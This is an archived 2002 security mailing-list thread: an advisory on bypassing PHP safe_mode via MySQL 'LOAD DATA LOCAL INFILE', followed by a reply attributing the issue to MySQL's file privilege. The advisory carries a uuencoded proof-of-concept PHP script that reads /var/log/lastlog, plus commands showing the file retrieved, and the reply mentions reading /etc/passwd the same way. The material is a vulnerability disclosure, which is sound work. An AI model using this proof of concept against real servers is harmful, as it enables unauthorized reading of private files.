7945369 2002-02-03 22:21 +0000 /137 rader/ Dave Wilson <dw@DAHOMELANDS.NET>
Sänt av: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Importerad: 2002-02-04 20:15 av Brevbäraren
Extern mottagare: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Externa svar till: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Mottagare: NTBugTraq (import) <4390>
Mottagare: Bugtraq (import) <20813>
Sänt: 2002-02-05 02:09
Ärende: PHP Safe Mode Filesystem Circumvention Problem
------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
------------------------------------------------------------------------------
Security Advisory DW020203-PHP
Release: 3rd February 2002
PHP Safe Mode Filesystem Circumvention Problem
Severity: Medium to high.
Affects: PHP, all versions which include safe_mode feature.
Platform: UNIX, Microsoft Windows, any platforms on which PHP is available.
Vendor: http://php.net.
Discovered: 12th January 2002, Dave Wilson <dw@dahomelands.net>, using
PHP 4.1.0 & Apache 2 on Linux.
------------------------------------------------------------------------------
VULNERABILITY IN BRIEF
PHP (since version 3?) includes a commonly used feature known as
Safe Mode. When enabled, scripts are highly limited in their
ability to access or execute local files, among other things.
PHP relies on a wrapper function around all filesystem calls to
perform access checks, but unforunately the bundled MySQL client
library has not been modified to perform such checks on "LOAD DATA
INFILE LOCAL" statements.
If an attacker has access to a MySQL server (either provided by
you or himself), he can use it as a proxy by which to download
files residing on the safe_mode-enabled web server. For large ISPs
relying on this feature for individual customer privacy, it could
mean clients accessing each other's files, or viewing of files on
an improperly secured server.
FIX
Currently, no fix exists. You may use other PHP safe_mode
functions to disable the use of the MySQL client library, or
secure your servers in a proper fashion.. A suggested fix for the
PHP developers might be to scan mysql_query()s for strings similar
to "LOAD DATA LOCAL INFILE".
Happy hackers out there might like to look at libmysql.c:1764 if interested
in fixing this problem, although that may only be possible from within PHP.
EXAMPLE
The attached script will (once configured correctly) attempt to
read "/var/log/lastlog" via the SQL daemon and return it to the
client.
$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?
0
COMMENTS
Due to the nature of the PHP project, development is very rapid
and hence many sites do not keep up with latest PHP versions. If a
fix was available, it would take quite a while to propagate.
It is likely that this is not an isolated problem in PHP, my bets
are on PostgreSQL and other PHP database extensions missing this
one too.
The MySQL support has been enabled in PHP by default for as long
as I can remember.
DAVE WILSON
Currently residing in Belfast, Northern Ireland, he is available
for work relating to network security auditing, post-attack
recovery and forensics, and penetration testing. He may be
contacted at <dw@dahomelands.net>. If you have any comments
regarding this advisory, please contact him directly.
Sun Feb 3 21:23:03 GMT 2002 -dw
begin 644 safe_mode.php
M/#\*"B\J"B`@(%!(4"!3869E($UO9&4@4')O8FQE;0H*("`@5&AI<R!S8W)I
M<'0@=VEL;"!C;VYN96-T('1O(&$@9&%T86)A<V4@<V5R=F5R(')U;FYI;F<@
M;&]C86QL>2!O<B!O=&AE<G=I<V4L"B`@(&-R96%T92!A('1E;7!O<F%R>2!T
M86)L92!W:71H(&]N92!C;VQU;6XL('5S92!T:&4@3$]!1"!$051!('-T871E
M;65N="!T;PH@("!R96%D(&$@*'!O<W-I8FQY(&)I;F%R>2D@9FEL92P@=&AE
M;B!R96%D<R!I="!B86-K('1O('1H92!C;&EE;G0N"@H@("!!;GD@='EP92!O
M9B!F:6QE(&UA>2!P87-S('1H<F]U9V@@=&AI<R`G<')O>'DG+B!!;'1H;W5G
M:"!U;G)E;&%T960L('1H:7,*("`@;6%Y(&%L<V\@8F4@=7-E9"!T;R!A8V-E
M<W,@9FEL97,@;VX@=&AE($1"('-E<G9E<B`H86QT:&]U9V@@=&AE>2!M=7-T
M(&)E"B`@('=O<FQD+7)E861A8FQE(&]R(&EN($UY4U%,9"=S(&)A<V5D:7(L
M(&%C8V]R9&EN9R!T;R!D;V-S*2X**B\*"@HD:&]S="`]("=L;V-A;&AO<W0G
M.PHD=7-E<B`]("=R;V]T)SL*)'!A<W,@/2`G;&5T;65I;B<["B1D8B`@(#T@
M)W1E<W1?9&%T86)A<V4G.PH*)&9I;&5N86UE(#T@)R]V87(O;&]G+VQA<W1L
M;V<G.R`@("`@+RH@1FEL92!T;R!G<F%B(&9R;VT@6VQO8V%L72!S97)V97(@
M*B\*)&QO8V%L(#T@=')U93L@("`@("`@("`@("`@("`@("`@("`@+RH@4F5A
M9"!F<F]M(&QO8V%L(&9I;&5S>7-T96T@*B\*"@HD;&]C86P@/2`D;&]C86P@
M/R`G3$]#04PG(#H@)R<["@HD<W%L(#T@87)R87D@*`H@("`B55-%("1D8B(L
M"@H@("`G0U)%051%(%1%35!/4D%262!404),12`G("X@*"1T8FP@/2`G02<N
M=&EM92`H*2D@+B`G("AA($Q/3D="3$]"*2<L"@H@("`B3$]!1"!$051!("1L
M;V-A;"!)3D9)3$4@)R1F:6QE;F%M92<@24Y43R!404),12`D=&)L($9)14Q$
M4R`B"B`@("X@(E1%4DU)3D%4140@0ED@("`@("`@)U]?5$A)4U].159%4E](
M05!014Y37U\G("(*("`@+B`B15-#05!%1"!"62`@("`@("`@("`G)R`B"B`@
M("X@(DQ)3D53(%1%4DU)3D%4140@0ED@)U]?5$A)4U].159%4E](05!014Y3
M7U\G(BP*"B`@(")314Q%0U0@82!&4D]-("1T8FP@3$E-250@,2(**3L*"DAE
M861E<B`H)T-O;G1E;G0M='EP93H@=&5X="]P;&%I;B<I.PH*;7ES<6Q?8V]N
M;F5C="`H)&AO<W0L("1U<V5R+"`D<&%S<RD["@IF;W)E86-H("@D<W%L(&%S
M("1S=&%T96UE;G0I('L*("`@)'$@/2!M>7-Q;%]Q=65R>2`H)'-T871E;65N
M="D["@H@("!I9B`H)'$@/3T@9F%L<V4I(&1I92`H"B`@("`@(")&04E,140Z
M("(@+B`D<W1A=&5M96YT("X@(EQN(B`N"B`@("`@(")214%33TXZ("(@+B!M
M>7-Q;%]E<G)O<B`H*2`N(")<;B(*("`@*3L*"B`@(&EF("@A("1R(#T@0&UY
M<W%L7V9E=&-H7V%R<F%Y("@D<2P@35E344Q?3E5-*2D@8V]N=&EN=64["@H@
L("!E8VAO("1R(%LP73L*("`@;7ES<6Q?9G)E95]R97-U;'0@*"1Q*3L*?0H`
`
end
-----BEGIN PGP SIGNATURE-----
iEYEARECAAYFAjxds+sACgkQs0ye6vw1XQFp4ACgktwtq2IXVxhY1gXOSfmnRpa5
MBMAnjqqAm/KKS0A4EzaRTa7fpdCAbk7
=DP/f
-----END PGP SIGNATURE-----
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by Qualys - Make Your Network Secure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Go Beyond PARTIAL Security: FREE White Paper
Stop hassling with half-baked ENTERPRISE SECURITY. FREE White Paper
shows you how to ensure TOTAL security for your Internet perimeter
with the most current and most complete PROACTIVE Vulnerability
Assessment solution. Get your FREE White Paper now. Click here!
https://www.qualys.com/forms/techwhite_86.html
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
(7945369) /Dave Wilson <dw@DAHOMELANDS.NET>/(Ombruten)
Kommentar i text 7959269 av Ben Wheeler <b.wheeler@ULCC.AC.UK>
7959269 2002-02-05 09:33 +0000 /47 rader/ Ben Wheeler <b.wheeler@ULCC.AC.UK>
Sänt av: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Importerad: 2002-02-06 22:23 av Brevbäraren
Extern mottagare: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Externa svar till: b.wheeler@ULCC.AC.UK
Mottagare: NTBugTraq (import) <4408>
Kommentar till text 7945369 av Dave Wilson <dw@DAHOMELANDS.NET>
Ärende: Re: PHP Safe Mode Filesystem Circumvention Problem
------------------------------------------------------------
On Sun, Feb 03, 2002 at 10:21:44PM +0000, Dave Wilson wrote:
> PHP relies on a wrapper function around all filesystem calls to perform
> access checks, but unforunately the bundled MySQL client library has not
> been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements.
[...]
> If an attacker has access to a MySQL server (either provided by you or
> himself), he can use it as a proxy by which to download files
Surely this only works if the (MySQL) username which PHP uses to
access the database has been granted the 'file' privilege to that
database in MySQL's grant tables.
The MySQL manual makes it quite clear that the 'file' privilege
should not routinely be granted.
-- begin quote --
* Don't give the *file* privilege to all users. Any user that has
this privilege can write a file anywhere in the file system with
the privileges of the `mysqld' daemon!
[...]
The *file* privilege may also be used to read any file accessible
to the Unix user that the server runs as. This could be abused,
for example, by using `LOAD DATA' to load `/etc/passwd' into a
table, which can then be read with `SELECT'.
-- end quote --
I think it's not up to PHP to spot things like this, it's up to the
MySQL administrators to set up their databases securely.
--
Ben Wheeler <b.wheeler@ulcc.ac.uk>
ULCC, but I do not speak for them.
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by Qualys - Make Your Network Secure
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Go Beyond PARTIAL Security: FREE White Paper
Stop hassling with half-baked ENTERPRISE SECURITY. FREE White Paper
shows you how to ensure TOTAL security for your Internet perimeter
with the most current and most complete PROACTIVE Vulnerability
Assessment solution. Get your FREE White Paper now. Click here!
https://www.qualys.com/forms/techwhite_86.html
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
(7959269) /Ben Wheeler <b.wheeler@ULCC.AC.UK>/(Ombruten)